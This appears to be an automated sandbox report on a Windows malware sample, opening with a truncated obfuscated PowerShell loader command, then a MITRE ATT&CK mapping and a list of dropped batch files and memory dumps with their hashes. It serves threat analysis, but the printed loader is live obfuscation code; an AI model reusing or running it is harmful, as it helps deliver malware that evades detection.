tre,eSpdterDigitnUnavoePur s= Vide$ HoustUddanrTwi luMa zoeDyble ') ;Forgifter110 $Smrristet;Forgifter110 (Postludiernes249 'DalsnSSt,lotVaskea.iljbr Slv tFuels-Over Scentel Dksde Ty.deRabatpSubar Unsai4meta, ');Forgifter110 (Postludiernes249 'Dikte$TermigFremslspassoUnwarbNatriaTranqlSluse:.yrtalJ.eriohamaukquaysa Ti.klErotin Op aeStatitPuffesVampe=P orh( fl,bTparoceGl.omsCountt Ant,-AndroPSandwa BilgtAwa,ehBetuc Stea$Br chNH.miceLandbaStuditKdhak) rome ') ;Forgifter110 (Postludiernes249 '.olke$ SixtgAa delCerouo O,rabqueenaOverwlGrif.:G afeRUnc ee.ardamFlleso HemiuBir enMil.ftUnacceUnward ikl=Shell$Tunicg nonplLogiso ,elob utoaFrgedl W.rt:CraneK s miu SammlReviskReernlHalledCalameGranarH useeberni+geige+Femo.%Recep$Hyp.oF utilo P,ysrDdfdtrIsotoe DesttPersonIchthiHyllenNotewgbar.ks Brnen BenzaPum.ev DialnKioskeDesmo.LatercMissioF.emsu Se,inDa brt Dise ') ;$reskompagniers=$Forretningsnavne[$Remounted];}$railroadings=323828;$pylic=30530;Forgifter110 (Postludiernes249 'Probl$Spir g Ir,al Pu,aoNomi bS bstaLevnel He,m:E,herPbrillrBldtee DuelsUtroltInhaliMonkhg taljiFodriaesopht,agtkePoss. Hom.s=Indre I.deG MisseYderptAlbum-AngelC StoroWarnen ,ftetHofleeKodnin,ntert Jvna Mode,$provoN EpiseEstria.nintt Pr.t ');Forgifter110 (Postludiernes249 ' Mari$GutsygBagnil F,mioDdni.bSmovsaTa nel istv:FibreBWi toaKrydsaAfstrrAfpilePaus,bFlaxyuSkorsk ribleMrk,ltCarte Kapit=Unagg Indlu[ShipwSMicheyA stasBeregt.isheeChrommVinha.StjerCFrsteoBe.kynPrearvIndvieSlvstrBiavltBogs.]cloth:Fo ke: tumtFSnackrSk,avoPteromnon uBDukkea uddasGygeseGrnsa6Bomba4LowerSCranitPourbrJeepeiSmaaonUnmangNedsv(Ung.k$CatprP uessrMortaeJul ssElecttPtolei.ountg KattiHurasaAkkumtGa,veeuf rb)te.ti ');Forgifter110 (Postludiernes249 'bluel$TortugggebglRigseoapimabBo geaReweilInd e:De tiKBl.ckaSmitnpScalliRomantno asaInterlBong mRugdraForblrMillck rrepe rold Been kapel= hrli Bonde[UntidS,minayc,thos K.agt S.reeEksprmBilli.,kakbTradioeS kkoxCabirtBarga.MetabE,latynDespecSuspeoInddadImperiMockenUniveg Isol] Fori:Copar:Ult,aAChaffSDogeaCLeathI BrusITu,in. Ko.sG SkraeSubtrtSmaa S FoldtLevetr ElfoiRedounJu,elg Astr(speci$ yperBMaroka Insta ForsrHypereP.opabErudiu PoulkUpcryeAr ejtBonde)Litau ');Forgifter110 (Postludiernes249 'Volca$JazzggVejrtlMallooEnglub.ngenaStaall Gran: AtomSC,cklhT ggei un.urM.zzoaMac,okOpgavaHomoesGasteh TretiSkild=str u$ TomeKGenopaKonsupBran.iari mtchrisa R.thlUnastmUnproaSukker ilgkDenareBish,d Hjer.Vani s Sheau.inrib InspsArcatt Afrur De,oi RetynDejligShe l(Meta $ ForhrS rngaReskaiBelavlTail rVelseoPygalaPreimd,ddaniMetalnRamblgUnso,sDeca.,Tjre $TidsapNuminy TyphlPseudiPlan.cPr.pr)Subst ');Forgifter110 $Shirakashi;"
4⤵
- Command and Scripting Interpreter: PowerShell
PID:1748

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Mation.Ras && echo t"
5⤵
PID:4872

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\30D802E0E248FEE17AAF4A62594CC75A

Filesize
1KB

MD5
adab5c4df031fb9299f71ada7e18f613

SHA1
33e4e80807204c2b6182a3a14b591acd25b5f0db

SHA256
7fa4ff68ec04a99d7528d5085f94907f4d1dd1c5381bacdc832ed5c960214676

SHA512
983b974e459a46eb7a3c8850ec90cc16d3b6d4a1505a5bcdd710c236baf5aadc58424b192e34a147732e9d436c9fc04d896d8a7700ff349252a57514f588c6a1

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0968A1E3A40D2582E7FD463BAEB59CD

Filesize
1KB

MD5
285ec909c4ab0d2d57f5086b225799aa

SHA1
d89e3bd43d5d909b47a18977aa9d5ce36cee184c

SHA256
68b9c761219a5b1f0131784474665db61bbdb109e00f05ca9f74244ee5f5f52b

SHA512
4cf305b95f94c7a9504c53c7f2dc8068e647a326d95976b7f4d80433b2284506fc5e3bb9a80a4e9a9889540bbf92908dd39ee4eb25f2566fe9ab37b4dc9a7c09

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\30D802E0E248FEE17AAF4A62594CC75A

Filesize
338B

MD5
42300395832a22eebba473536184d928

SHA1
8ba4e0376d670f404de45e538701a80f572620c1

SHA256
f75a44544dfdcd5a85c11997081ee19d60a7cbb272e80b054f0dd78e227e4a2a

SHA512
8d28333d56119a56523bd582ced322f6fd55155d9f5c8aa2eab92fcd30a6af19c07e0c4a039b8097ca88d4f234abc116550ddcbeb87a8fc127ec6ebe1e070cd4

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Filesize
330B

MD5
61357c303b70efa95b458fc5b091c3bf

SHA1
a329f787be27d0ade822b7a85aa443e3ff77d44c

SHA256
0dbd6fd3d4c25309f545a80cbb9e3b555e57523f64bde408deb2485c592c1649

SHA512
18d9934dd999c6e14f4ad5fe9eeb39ab39c8e9ddb3330fca9d9585a0ac88a621f9db5a3d544640b4cae7afe0ee97f48d8cc765a0c403416127b993f5bd3b8a91

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0968A1E3A40D2582E7FD463BAEB59CD

Filesize
306B

MD5
4407bdd28da6b2495c19632f8154cf6c

SHA1
2af3b86ee6224b7483559baa1db93e6651fcdbb3

SHA256
1877a548d0898934b08487f97ee7d6ae6ac6f2752ed7e23371e4657184b1bae8

SHA512
7564cafdc0f315d5382ac3d040d9789fecb7c0abd058e283c5d84698cf97a3d24de7860ba7cd4e7636f07ecbf5f24d554e1ad8367aa9e3dd8911e6911cb3c1fe

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0968A1E3A40D2582E7FD463BAEB59CD

Filesize
306B

MD5
4073966e726ccba397ceb46692b62b1a

SHA1
567f1cef9014f53e4e1d6ab30f75b496cdecfeed

SHA256
432ecaa5c1bbe7872a52f87515cf9897625c11ae914571136636ce7ddcd5d3ae

SHA512
c0a77c290605576587d21f3de5f5f61fae789842c2825de7c513e1d04ae654f5d9cb27b76dc51e82117358b51a35f8df443863d6c2e891446c929de85d3c05f6

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0968A1E3A40D2582E7FD463BAEB59CD

Filesize
306B

MD5
9ed007d7c1e3f105d1300b4ace15f6ea

SHA1
3c33fa5cd1def5d07510838a7d94faaee72ad98f

SHA256
b2dfee4c11e55d1cce5b2fa87b16b8f2657733e172b2b863115b2021b9cef75b

SHA512
291ed4cc412774e63f9514fe6355aec005d5fc6af7106415b7bd21c9a18a17fb80f8119ed4e65561181faa6ad935178393339e41452808d0fdb9bb064fd29dd6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
62KB

MD5
e566632d8956997225be604d026c9b39

SHA1
94a9aade75fffc63ed71404b630eca41d3ce130e

SHA256
b7f66a3543488b08d8533f290eb5f2df7289531934e6db9c346714cfbf609cf0

SHA512
f244eb419eef0617cd585002e52c26120e57fcbadc37762c100712c55ff3c29b0f3991c2ffa8eefc4080d2a8dbfa01b188250ea440d631efed358e702cc3fecd

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3a55iiby.tv0.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\cegtcm.bat

Filesize
6KB

MD5
c34fc67ae93da5d1375977d2718ba846

SHA1
e51e5bcb2b3d00d0237da792ae166190700bcf64

SHA256
9174e42d101558981aafc29c5d2d144c428ca1f8c0490f2e6d75ce5737eb0b10

SHA512
17d57679bd1fab1f01ea0ad26d5ebb46f5ffbeb339bee80fa4f975260bf5bf429693b7fb9d90dea68522d0e1b72de77b5c3ae44d1f28a9036094ed45f5b7ae10

Download Submit
C:\Users\Admin\AppData\Local\Temp\cmmuwj.bat

Filesize
6KB

MD5
810ffb68e0e1ce0103c5d12147d84595

SHA1
b89cf98b3ae7cb2dafad2a9826869c42d04a5163

SHA256
51793c8fc820a27e081b72bd62ea7a5e7bd2cc97783a102ab892ef3ea78fcc79

SHA512
f5487a973a2336a38f7f8dd34ef5ccff3a006d40395811c04d95786750342e991f78a2d11b2248f90249cbfd5140acf5a0d3b538d1582043dd319de7df975411

Download Submit
C:\Users\Admin\AppData\Local\Temp\gazcwc.bat

Filesize
6KB

MD5
4ca306f2071840c12de163749191b307

SHA1
a14b19e4e3a9fcee4ce81426f47dcb4517344135

SHA256
8f43eeb0a4705568dd70336c225a7e715ee3060a28d40a44c28d8df7c9671a27

SHA512
5f4c34ae7cad5d5c665a5633f974b21fe09a768a3b368a7bac3017a33bbf7432abf4a5b6e4f54cef9138038b425119c41857c6dfd14464850dc10b70aee7d6b3

Download Submit
C:\Users\Admin\AppData\Local\Temp\glotmy.bat

Filesize
6KB

MD5
eb6012f264c7857f173d58143e77c6e3

SHA1
b1429732c9a56c424155678621f54d073bcc2a3f

SHA256
dc16538518262047141c0d5257ada76b374a033ed6634e44303f095fad980119

SHA512
590fac881aa37931e56278060869500e1b3d7a132417afba9d8c387ab4b736b4254675375728faaf8acb24e9a78cf49a2e51c7f977e65005422bfce5a38c0dfa

Download Submit
C:\Users\Admin\AppData\Local\Temp\iqaeqv.cmd

Filesize
6KB

MD5
0af7650781e9e2cd14ebc1972946d92d

SHA1
941931a2ab204a2eb77193d4e75e4981c87720a7

SHA256
ed7342b599aabdfd706087f20249871c242ee185d347042c8007ca312c8881d3

SHA512
4b356947445643e663a1a043a2ff9484fa7848531a7f1c7f28d9273c4a95c6f99d5c61e78b51cb2dfa5607aa825eeeaa247c39a604fec7c7264c3cf4e7d9811f

Download Submit
C:\Users\Admin\AppData\Local\Temp\izmcld.cmd

Filesize
6KB

MD5
c76b9c322a3f11bf78425f43b7552fcb

SHA1
b17fe7a7a989e833e997cc80792cbd22caca9efc

SHA256
777c855b301e69e408f94edcc9c884ba23001a96e1cb0ea0422d218b3b5ef867

SHA512
4a0ea09c52b1f4550d7712f30752324e756928840b01df9453081893e36ecbf91d12a076e9cfe33a40263eb85b762ae46d85708c38e4f023340928fc4d3be8f3

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
6KB

MD5
9c0bcb88387170cd50e49b2bfe1a33d0

SHA1
3af5561182ddba3a451a371a20092d020db8a3e7

SHA256
944992b08f375ce36c7be45beb081e3c25124b524c493ee1529488a0f2dbadfe

SHA512
1ba455626a9e8ccc6fec48605b387bf960ab4b0dff5915ee7f4ed290cb90ebb2f1f896f945720043f49ead2b417e9297ff382af9560bf05ae44c1c606cde2129

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
6KB

MD5
6c5f63ab6ebf4f827aa34a64c0d5001a

SHA1
73472cebac45ca00ce67511cbfe3a745b171f922

SHA256
e7afb73e29e6645f8a63741d6e0bc0550e9469679cf938f0d0042e83c33c30e3

SHA512
bfc6417797cdca97f127302321f308a454fd1d9ad7d4c4b6c95d192f931b3dd85fa234ec315ba52507043612d097fab874f3ff29b197fd3845a458bfdb7a20d0

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
6KB

MD5
428ed3ddf156fade9fa0f1aa58299b03

SHA1
81c75d13ffee197466f296e286030f78a5e822a1

SHA256
26d7e3baf9cc8dbd545a6e22690f91ba2b8c55c2d98adb4b66736565403083ea

SHA512
9ccaed86fa898f3529d97d44983452557e3d0db734cc433a114d253d149124cf7b0cc22231c2a079692f6937bd42023719f31a855405e26a8b68ba0d75fd0032

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
6KB

MD5
171f1fd982362054ac759d0e42722684

SHA1
deff636a089293d53be4d557eaaf0091f24d703e

SHA256
45dffe7d3acfb44e89db89a92c1492c27c525dc4d07a6f157426a83556190cc5

SHA512
fd1c2e4946aafdda4634105136a77a620cfa70a5367448165550b8138649ab59c3060612b1823661bffca8681f2c7e76501e50aab4f4a31d82d1742706fec562

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\AW9T9P7XJOYII1W43KQC.temp

Filesize
6KB

MD5
28184f08f580e0cf1c5aedab5254db60

SHA1
d13ced976d433d72645861dfe017f7765e68b7db

SHA256
0b769a632bf10bd41310cfa190ca9cb2a81c2eb641ce03aad7de8f8f6a28a234

SHA512
40cf1adf8e7788d61632a27845eb4518c83772c57f0458c94ebdb04f7b7ed3feec651ef7f0263aae524d8e0d5bd21d19ffc38075e267a78b61b59bfdcd1eb72b

Download Submit
memory/728-15-0x00007FFA6A2E0000-0x00007FFA6A4E9000-memory.dmp

Filesize
2.0MB

Download
memory/728-17-0x000002D2B0800000-0x000002D2B0810000-memory.dmp

Filesize
64KB

Download
memory/728-18-0x000002D2B0810000-0x000002D2B0820000-memory.dmp

Filesize
64KB

Download
memory/728-20-0x00007FFA49280000-0x00007FFA49D42000-memory.dmp

Filesize
10.8MB

Download
memory/728-16-0x00007FFA690D0000-0x00007FFA6918D000-memory.dmp

Filesize
756KB

Download
memory/728-0-0x00007FFA49283000-0x00007FFA49285000-memory.dmp

Filesize
8KB

Download
memory/728-19-0x00007FFA49280000-0x00007FFA49D42000-memory.dmp

Filesize
10.8MB

Download
memory/728-14-0x000002D2B07F0000-0x000002D2B0800000-memory.dmp

Filesize
64KB

Download
memory/728-13-0x000002D2B0820000-0x000002D2B0866000-memory.dmp

Filesize
280KB

Download
memory/728-12-0x00007FFA49280000-0x00007FFA49D42000-memory.dmp

Filesize
10.8MB

Download
memory/728-11-0x00007FFA49280000-0x00007FFA49D42000-memory.dmp

Filesize
10.8MB

Download
memory/728-10-0x00007FFA49280000-0x00007FFA49D42000-memory.dmp

Filesize
10.8MB

Download
memory/728-9-0x000002D2B0780000-0x000002D2B07A2000-memory.dmp

Filesize
136KB

Download